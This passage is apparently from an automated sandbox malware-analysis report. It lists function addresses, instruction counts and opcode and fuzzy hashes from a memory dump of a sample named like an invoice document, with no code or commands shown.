                                                                                                                                • Instruction ID: 76d8fc936c17569d2d0904bb84dcfd7dfebfd5c24946f30c55acc7cb1c29d869
                                                                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                • Instruction Fuzzy Hash: 74317C31600605EFD721CF68C888F6ABBB9FF45354F1145A9EA52CB2A4E770EE42CB50
                                                                                                                                Function 0177E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 177decee44ee52632c47bd22badecd4da147229725681ac1e5276bad1efd5291
                                                                                                                                • Instruction ID: c688e936e0651254ed1d3b10dc5d6f4b649caeae5cd3f6b214dcaa15b680b3b5
                                                                                                                                • Opcode Fuzzy Hash: 177decee44ee52632c47bd22badecd4da147229725681ac1e5276bad1efd5291
                                                                                                                                • Instruction Fuzzy Hash: B3314975A002059FCF14DF18C8889AEB7B6FF84714F158499E809DB395EB71AA50CB91
                                                                                                                                Function 017806F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
                                                                                                                                • Instruction ID: ef25c59849eb914fec9ef44d103c9454c8e370b39175af5e3b10acaba7df8095
                                                                                                                                • Opcode Fuzzy Hash: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
                                                                                                                                • Instruction Fuzzy Hash: CE219F76900629ABCF24EF59C881ABEF7F4FF48740B554069F941EB244D738AD42CBA1
                                                                                                                                Function 0178019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
                                                                                                                                • Instruction ID: 3258189bbd92b7dc82776a4435d601a20560c95c15e8d73e218aa476bd06b9d3
                                                                                                                                • Opcode Fuzzy Hash: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
                                                                                                                                • Instruction Fuzzy Hash: A4219C71A00645AFD715EBACD844F6AF7A8FF48750F140069F944DB6A0D734ED40CBA4
                                                                                                                                Function 01780283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
                                                                                                                                • Instruction ID: cdad74c3dc42250308ac33c7a663784bb413b0685bf7c7bab3bd1d75db56f6cb
                                                                                                                                • Opcode Fuzzy Hash: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
                                                                                                                                • Instruction Fuzzy Hash: 9221D0729443469FD711EF5DC848F5BFBECAFA0250F08045ABD80C7655D730C909C6A2
                                                                                                                                Function 01722835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
                                                                                                                                • Instruction ID: 3678045f7fa54f2ee777412d494385d41980adbb6ae81c50cb8422bb3ac26a63
                                                                                                                                • Opcode Fuzzy Hash: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
                                                                                                                                • Instruction Fuzzy Hash: E0210E317456919BE322676C8C08F15FBD5AF41774F2903A4FE60AF6DBD7A8D882C150
                                                                                                                                Function 0173A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
                                                                                                                                • Instruction ID: 590c1c1ed8586e374e596136331464c55877c4cee70541a24e5b9809a3d78c99
                                                                                                                                • Opcode Fuzzy Hash: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
                                                                                                                                • Instruction Fuzzy Hash: AA21A779240B019FCB29DF29CC01B56B7F5BF48B14F2484ACA549CBB66E371E842CB94
                                                                                                                                Function 017BA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e19f6d66cf5a753ff5d8723fb6f6a758ddc8e6dc19db9072e23ff6310b47be95
                                                                                                                                • Instruction ID: 870a00d97be755f4a691762705a84be19df88901ec91b8df9cf6bc37effad1ec
                                                                                                                                • Opcode Fuzzy Hash: e19f6d66cf5a753ff5d8723fb6f6a758ddc8e6dc19db9072e23ff6310b47be95
                                                                                                                                • Instruction Fuzzy Hash: DB11E772740A11BFD72266599C85FABF6D9DFD4B60F610028B709CB184EB60DD0187A5
                                                                                                                                Function 01780946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 983da0b4b54b118d8a8a9b08c01d5b0453099bc0f2ffa14aebee26b632b933a8
                                                                                                                                • Instruction ID: b08e5627a1266a024c251a87549a24a3c4fa957fb084e1f6fa4a5d17cdaf851d
                                                                                                                                • Opcode Fuzzy Hash: 983da0b4b54b118d8a8a9b08c01d5b0453099bc0f2ffa14aebee26b632b933a8
                                                                                                                                • Instruction Fuzzy Hash: 4E21E3B1E40209EFCB20DFAAD884AAEFBF8FF98710F10012FE505A7244D6709945CB64
                                                                                                                                Function 017980A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                • Instruction ID: 6cf8c5707ddbca2bcad46de7c5176f7c1b117e5c42f3e1bb5a04c3d837d30632
                                                                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                • Instruction Fuzzy Hash: 64218EB2A00209EFDF129F98DC44BAEFBB9EF89350F244859F910A7251E734D9509B50
                                                                                                                                Function 01730124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                • Instruction ID: 4909b75a7df67f33bf0449de7cf7d956cca125d77be2518e5e798ddf13d8c23e
                                                                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                • Instruction Fuzzy Hash: 4911DD73601605AFE722DA48CC84F9EBBB8EB84754F100029F6018F191D671ED44DB60
                                                                                                                                Function 01708770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
                                                                                                                                • Instruction ID: eecfb0c04cff2c8313982f094e4bc2028b203d2c421c7d10b011cb21607671a6
                                                                                                                                • Opcode Fuzzy Hash: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
                                                                                                                                • Instruction Fuzzy Hash: E911B271B00711DBDB12CF8DC480A56FBE9AF9A714B18407EEE08DF249D6B2D9018B92
                                                                                                                                Function 0173AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                • Instruction ID: 1baf8f100a45b8c99ea0850371f00118d6813b0b7b899858b3e54f74861df491
                                                                                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                • Instruction Fuzzy Hash: 13217972600A41DFDB298F4DC545A66FBE6EBD4B10F14887DE58ACBA26C731EC01CB80
                                                                                                                                Function 017080E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                                • Instruction ID: e2587b46b9027b34d9675717590d8bb956bff48774ddfd63f0cd771740c9835e
                                                                                                                                • Opcode Fuzzy Hash: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                                • Instruction Fuzzy Hash: 9F216835A00206DFCB15CF98C580AAAFBF6FF88318F2441ADD105AB354CB71AD06CB91
                                                                                                                                Function 0173674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                                • Instruction ID: 519377f183e67e008f6ce3bddadc9c78c0ae36e3cb5caf69d70fcedf778c0711
                                                                                                                                • Opcode Fuzzy Hash: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                                • Instruction Fuzzy Hash: EF215C75600A01EFD7219F69C881B66F7F8FF84650F44882DF5AAC7252EB70E950CBA1
                                                                                                                                Function 01796870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                                • Instruction ID: a6417cec0ee7762771cbd231139196967c5814e45b9e6630d6d18d38b69b3ada
                                                                                                                                • Opcode Fuzzy Hash: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                                • Instruction Fuzzy Hash: BB11C132240514EBCB22DB5DE940F9AFBA8EB99A60F114129F2019B251DA70E809C790
                                                                                                                                Function 0172E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                                • Instruction ID: 45bc4d14012fb721a2b52a8d3ef662931c6dfc312d2ee063cd762639567071d6
                                                                                                                                • Opcode Fuzzy Hash: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                                • Instruction Fuzzy Hash: F11108333041249FCB19DB29DC95A6BF25AEFD5370B254539EA228B395ED309802C391
                                                                                                                                Function 017366B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                                • Instruction ID: 660e852266356b4d952d56cf7eaef0efa722a73c09eb67f4c2f3efeb6d811b05
                                                                                                                                • Opcode Fuzzy Hash: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                                • Instruction Fuzzy Hash: 7011BF76A01205EBCB26DF59C580A5AFBE5EBC4650B518079E9059B316E630DE00CBA0
                                                                                                                                Function 017CA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction ID: 1eef5b761b4679f8930a04d62a27094183a4286716d9e9f0c52d928bf63378d1
                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction Fuzzy Hash: D8110436A00909AFDB19CB58C845B9DFBB5EF84710F05826DE84597344E631BE41CB80
                                                                                                                                Function 01700AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                • Instruction ID: 65fc7179ac838f9f0f8db4054171bb5b9dac7d10f03f24145475155999845ce2
                                                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                • Instruction Fuzzy Hash: 8C2106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                                                                                                Function 0178E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction ID: faf975da205d00c1fd6dd3b0f36308f3a3c4eb4a26c3db1672da744c81a62b05
                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction Fuzzy Hash: C811A0326D0601EFE721AF49C848B5EFBE5EF45754F059428EA099B260DF71DC40DB90
                                                                                                                                Function 017227ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                                • Instruction ID: c0b170e8ee045eed2efedda403a4a1bae8e9490620533c60cd29d47f7a1be958
                                                                                                                                • Opcode Fuzzy Hash: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                                • Instruction Fuzzy Hash: 6E014931745685AFE316A66EDC48F27FB8CEF90390F0500B5FD009B296DA54DC01C271
                                                                                                                                Function 01704690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                                • Instruction ID: cca00b15c86cd606229ca11550e41065146dc7b054c2fd7b14d89451c839b635
                                                                                                                                • Opcode Fuzzy Hash: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                                • Instruction Fuzzy Hash: 4711A036600745EFDB27CF5DD944B56BBE8EB86764F005119FA068B690C770E800CF60
                                                                                                                                Function 017D4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                                • Instruction ID: 312e1d4d84b878de25ba4905e9eb24e115d72aadfb9bf6f5c71552289956f4e9
                                                                                                                                • Opcode Fuzzy Hash: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                                • Instruction Fuzzy Hash: 3E11C2362006199FD7229B6DD844F67F7B6FFD4720F194429EA8787A94DA30A802CB90
                                                                                                                                Function 01736620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                                • Instruction ID: 6ead4c3d4cc822fcc186ec53b81fb78956d4995d65eb0771bd791df9f077ff45
                                                                                                                                • Opcode Fuzzy Hash: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                                • Instruction Fuzzy Hash: B1118272A00715FBDB22DF59C984B5EFBB8FF84790F510459EA01A7245D730AE019B60
                                                                                                                                Function 0172EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                                • Instruction ID: f6d62f2e7707a9bba2c4763c8daed040a51fec3c01dc22b0ee581887c0348749
                                                                                                                                • Opcode Fuzzy Hash: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                                • Instruction Fuzzy Hash: C4019E7150120A9FC725DF19D448F26FBF9EB85324F21816EE2058B2A8CB70AD82CB90
                                                                                                                                Function 0172E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction ID: 35e54029b00838ee43cf05dbbc7f0aafdd3c82125fbf8118db311e470639d43b
                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction Fuzzy Hash: EA110C712116D19BE723972DD968F25F7D8FF01754F1900E0DD41C7642F728C982C650
                                                                                                                                Function 0178E75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction ID: c8a28e996fd46f0966e681a1791f1d1a0e5cb9205ff0c77926077d404b98d63f
                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction Fuzzy Hash: 33019236640205EFE725BF58CC08F5AFBA9EB95760F058474EA059B264EB71DD80C790
                                                                                                                                Function 016FA250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
